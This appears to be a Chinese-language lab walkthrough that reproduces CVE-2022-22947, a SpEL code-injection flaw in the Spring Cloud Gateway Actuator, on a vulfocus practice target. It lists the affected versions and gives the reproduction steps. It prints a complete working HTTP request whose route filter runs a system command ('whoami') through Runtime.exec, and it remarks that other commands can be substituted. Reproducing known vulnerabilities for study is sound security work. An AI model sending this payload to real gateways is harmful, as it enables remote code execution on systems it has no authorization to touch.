參考:
https://y4er.com/post/cve-2022-22947-springcloud-gateway-spel-rce-echo-response
https://cloud.spring.io/spring-cloud-gateway/multi/multi__actuator_api.html
漏洞描述
使用Spring Cloud Gateway的應用程式在Actuator端點在啟用、公開和不安全的情況下容易受到程式碼注入的攻擊。攻擊者可以惡意建立允許在遠端主機上執行任意遠端執行的請求。
影響版本
Spring Cloud Gateway < 3.1.1 Spring Cloud Gateway < 3.0.7 Spring Cloud Gateway 其他已不再更新的版本
復現
1. 首先訪問vulfocus中的靶場。
2. 抓包,修改GET請求的引數
說明actuator這個埠是開啟的。
3. 檢視/actuator/gateway/routes/
返回的路由資訊,意思是當訪問index時,路由到http://example.com:80
訪問test時,路由到http://test.com:80
4. 利用actuator在閘道器中可以建立和刪除路由。
首先建立路由。注意是POST請求,
Content-Type: application/json這裡要修改為json。請求體中的內容是建立test3路由,讓他去執行我們的whoami命令,這裡我們可以修改為其他命令。
POST /actuator/gateway/routes/test3 HTTP/1.1 Host: 150.158.155.71:38031 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 Accept-Encoding: gzip, deflate Connection: close Upgrade-Insecure-Requests: 1 If-Modified-Since: Thu, 17 Oct 2019 07:18:26 GMT If-None-Match: "3147526947" Cache-Control: max-age=0 Content-Type: application/json Content-Length: 431 { "id": "test3", "filters": [ { "name": "AddResponseHeader", "args": { "value": "#{new java.lang.String(T(org.springframework.util.StreamUtils).copyToByteArray(T(java.lang.Runtime).getRuntime().exec(new String[]{\"whoami\"}).getInputStream()))}", "name": "cmd" } } ], "uri": "http://example.com:80", "order": 0 }
5. 重新整理路由。
6. 訪問我們建立的路由資訊。
7. 刪除自己建立的路由,用DELETE請求。
8. 重新整理一下,之後就發現已經被刪除了。